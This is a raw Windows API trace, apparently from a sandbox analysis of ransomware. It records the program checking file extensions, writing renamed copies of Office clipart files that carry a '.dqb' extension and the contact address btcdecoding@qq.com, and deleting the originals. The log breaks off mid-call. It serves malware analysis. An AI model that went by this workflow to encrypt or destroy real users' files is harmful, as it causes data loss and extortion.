[0055.632] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.632] lstrlenW (lpString=".xls") returned 4 [0055.632] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.632] lstrlenW (lpString=".xlsx") returned 5 [0055.633] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.633] lstrlenW (lpString=".ppt") returned 4 [0055.633] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.633] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 63 [0055.633] lstrlenW (lpString=".zip") returned 4 [0055.633] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.633] lstrlenW (lpString=".rar") returned 4 [0055.633] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.633] lstrlenW (lpString=".bz2") returned 4 [0055.633] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.633] lstrlenW (lpString=".7z") returned 3 [0055.633] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.633] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 63 [0055.633] lstrlenW (lpString=".dbf") returned 4 [0055.633] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.633] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 63 [0055.633] lstrlenW (lpString=".1cd") returned 4 [0055.633] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.633] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 63 [0055.633] lstrlenW (lpString=".jpg") returned 4 [0055.633] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.634] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.634] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.634] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00145_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x238 [0055.634] GetLastError () returned 0x0 [0055.635] ReadFile (in: hFile=0x23c, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x6b0, lpOverlapped=0x0) returned 1 [0055.715] WriteFile (in: hFile=0x238, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x6c0, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x6c0, lpOverlapped=0x0) returned 1 [0055.716] ReadFile (in: hFile=0x23c, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0055.716] WriteFile (in: hFile=0x238, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.716] SetEndOfFile (hFile=0x238) returned 1 [0055.899] CloseHandle (hObject=0x238) returned 1 [0055.934] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.934] SetEndOfFile (hFile=0x23c) returned 1 [0055.934] CloseHandle (hObject=0x23c) returned 1 [0055.935] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0055.935] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00145_.wmf")) returned 1 [0056.325] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 63 [0056.325] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 63 [0056.325] lstrlenW (lpString=".doc") returned 4 [0056.325] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.325] lstrlenW (lpString=".docx") returned 5 [0056.325] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.325] lstrlenW (lpString=".pdf") returned 4 [0056.325] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.325] lstrlenW (lpString=".xls") returned 4 [0056.325] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.325] lstrlenW (lpString=".xlsx") returned 5 [0056.325] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.325] lstrlenW (lpString=".ppt") returned 4 [0056.325] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.325] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 63 [0056.325] lstrlenW (lpString=".zip") returned 4 [0056.325] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.325] lstrlenW (lpString=".rar") returned 4 [0056.325] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.325] lstrlenW (lpString=".bz2") returned 4 [0056.325] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.325] lstrlenW (lpString=".7z") returned 3 [0056.325] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.325] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 63 [0056.325] lstrlenW (lpString=".dbf") returned 4 [0056.325] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.325] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 63 [0056.325] lstrlenW (lpString=".1cd") returned 4 [0056.325] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.325] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 63 [0056.325] lstrlenW (lpString=".jpg") returned 4 [0056.325] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0058.014] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.014] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.014] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00441_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0059.017] GetLastError () returned 0x0 [0059.025] ReadFile (in: hFile=0x15c, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0xdc4, lpOverlapped=0x0) returned 1 [0059.044] WriteFile (in: hFile=0x1e4, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xdd0, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xdd0, lpOverlapped=0x0) returned 1 [0059.045] ReadFile (in: hFile=0x15c, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0059.045] WriteFile (in: hFile=0x1e4, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xec, lpOverlapped=0x0) returned 1 [0059.045] SetEndOfFile (hFile=0x1e4) returned 1 [0059.045] CloseHandle (hObject=0x1e4) returned 1 [0059.046] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.046] SetEndOfFile (hFile=0x15c) returned 1 [0059.046] CloseHandle (hObject=0x15c) returned 1 [0059.046] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0059.047] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00441_.wmf")) returned 1 [0059.047] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 63 [0059.047] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 63 [0059.047] lstrlenW (lpString=".doc") returned 4 [0059.047] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0059.047] lstrlenW (lpString=".docx") returned 5 [0059.047] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0059.047] lstrlenW (lpString=".pdf") returned 4 [0059.047] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0059.047] lstrlenW (lpString=".xls") returned 4 [0059.047] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0059.047] lstrlenW (lpString=".xlsx") returned 5 [0059.047] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0059.047] lstrlenW (lpString=".ppt") returned 4 [0059.047] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0059.047] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 63 [0059.047] lstrlenW (lpString=".zip") returned 4 [0059.047] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0059.047] lstrlenW (lpString=".rar") returned 4 [0059.047] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0059.047] lstrlenW (lpString=".bz2") returned 4 [0059.047] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0059.047] lstrlenW (lpString=".7z") returned 3 [0059.047] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0059.047] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 63 [0059.047] lstrlenW (lpString=".dbf") returned 4 [0059.048] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0059.048] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 63 [0059.048] lstrlenW (lpString=".1cd") returned 4 [0059.048] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0059.048] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 63 [0059.048] lstrlenW (lpString=".jpg") returned 4 [0059.048] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0059.049] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.049] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.049] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00413_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0059.049] GetLastError () returned 0x0 [0059.049] ReadFile (in: hFile=0x15c, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0xa7f0, lpOverlapped=0x0) returned 1 [0059.051] WriteFile (in: hFile=0x1e4, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xa800, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xa800, lpOverlapped=0x0) returned 1 [0059.053] ReadFile (in: hFile=0x15c, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0059.053] WriteFile (in: hFile=0x1e4, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xec, lpOverlapped=0x0) returned 1 [0059.053] SetEndOfFile (hFile=0x1e4) returned 1 [0059.053] CloseHandle (hObject=0x1e4) returned 1 [0059.053] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.053] SetEndOfFile (hFile=0x15c) returned 1 [0059.054] CloseHandle (hObject=0x15c) returned 1 [0059.054] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0059.055] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00413_.wmf")) returned 1 [0059.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 63 [0059.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 63 [0059.055] lstrlenW (lpString=".doc") returned 4 [0059.055] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0059.055] lstrlenW (lpString=".docx") returned 5 [0059.055] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0059.055] lstrlenW (lpString=".pdf") returned 4 [0059.055] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0059.055] lstrlenW (lpString=".xls") returned 4 [0059.055] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0059.055] lstrlenW (lpString=".xlsx") returned 5 [0059.055] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0059.055] lstrlenW (lpString=".ppt") returned 4 [0059.055] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0059.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 63 [0059.055] lstrlenW (lpString=".zip") returned 4 [0059.055] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0059.055] lstrlenW (lpString=".rar") returned 4 [0059.055] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0059.055] lstrlenW (lpString=".bz2") returned 4 [0059.055] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0059.055] lstrlenW (lpString=".7z") returned 3 [0059.055] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0059.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 63 [0059.056] lstrlenW (lpString=".dbf") returned 4 [0059.056] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0059.056] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 63 [0059.056] lstrlenW (lpString=".1cd") returned 4 [0059.056] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0059.056] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 63 [0059.056] lstrlenW (lpString=".jpg") returned 4 [0059.056] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0059.056] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.056] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.056] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00414_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0059.056] GetLastError () returned 0x0 [0059.056] ReadFile (in: hFile=0x15c, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0xa79c, lpOverlapped=0x0) returned 1 [0059.059] WriteFile (in: hFile=0x1e4, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xa7a0, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xa7a0, lpOverlapped=0x0) returned 1 [0059.061] ReadFile (in: hFile=0x15c, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0059.061] WriteFile (in: hFile=0x1e4, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xec, lpOverlapped=0x0) returned 1 [0059.061] SetEndOfFile (hFile=0x1e4) returned 1 [0059.061] CloseHandle (hObject=0x1e4) returned 1 [0059.063] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.063] SetEndOfFile (hFile=0x15c) returned 1 [0059.064] CloseHandle (hObject=0x15c) returned 1 [0059.064] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0059.064] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00414_.wmf")) returned 1 [0059.064] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 63 [0059.064] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 63 [0059.064] lstrlenW (lpString=".doc") returned 4 [0059.064] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0059.064] lstrlenW (lpString=".docx") returned 5 [0059.064] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0059.064] lstrlenW (lpString=".pdf") returned 4 [0059.064] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0059.064] lstrlenW (lpString=".xls") returned 4 [0059.064] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0059.064] lstrlenW (lpString=".xlsx") returned 5 [0059.064] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0059.064] lstrlenW (lpString=".ppt") returned 4 [0059.064] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0059.065] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 63 [0059.065] lstrlenW (lpString=".zip") returned 4 [0059.065] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0059.065] lstrlenW (lpString=".rar") returned 4 [0059.065] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0059.065] lstrlenW (lpString=".bz2") returned 4 [0059.065] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0059.065] lstrlenW (lpString=".7z") returned 3 [0059.065] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0059.065] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 63 [0059.065] lstrlenW (lpString=".dbf") returned 4 [0059.065] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0059.065] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 63 [0059.065] lstrlenW (lpString=".1cd") returned 4 [0059.065] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0059.065] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 63 [0059.065] lstrlenW (lpString=".jpg") returned 4 [0059.065] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0059.065] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.065] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.065] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00419_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0059.066] GetLastError () returned 0x0 [0059.066] ReadFile (in: hFile=0x15c, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x2c8, lpOverlapped=0x0) returned 1 [0059.067] WriteFile (in: hFile=0x1e4, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x2d0, lpOverlapped=0x0) returned 1 [0059.067] ReadFile (in: hFile=0x15c, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0059.067] WriteFile (in: hFile=0x1e4, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xec, lpOverlapped=0x0) returned 1 [0059.068] SetEndOfFile (hFile=0x1e4) returned 1 [0059.068] CloseHandle (hObject=0x1e4) returned 1 [0059.068] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.068] SetEndOfFile (hFile=0x15c) returned 1 [0059.068] CloseHandle (hObject=0x15c) returned 1 [0059.068] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0059.069] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00419_.wmf")) returned 1 [0059.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 63 [0059.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 63 [0059.069] lstrlenW (lpString=".doc") returned 4 [0059.069] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0059.069] lstrlenW (lpString=".docx") returned 5 [0059.069] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0059.069] lstrlenW (lpString=".pdf") returned 4 [0059.069] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0059.069] lstrlenW (lpString=".xls") returned 4 [0059.069] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0059.069] lstrlenW (lpString=".xlsx") returned 5 [0059.069] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0059.069] lstrlenW (lpString=".ppt") returned 4 [0059.069] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0059.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 63 [0059.069] lstrlenW (lpString=".zip") returned 4 [0059.070] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0059.070] lstrlenW (lpString=".rar") returned 4 [0059.070] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0059.070] lstrlenW (lpString=".bz2") returned 4 [0059.070] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0059.070] lstrlenW (lpString=".7z") returned 3 [0059.070] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0059.070] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 63 [0059.070] lstrlenW (lpString=".dbf") returned 4 [0059.070] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0059.070] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 63 [0059.070] lstrlenW (lpString=".1cd") returned 4 [0059.070] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0059.070] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 63 [0059.070] lstrlenW (lpString=".jpg") returned 4 [0059.070] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0059.070] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.070] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.070] CreateFileW (lpFileName="C:\\Program Files\\Microsoft 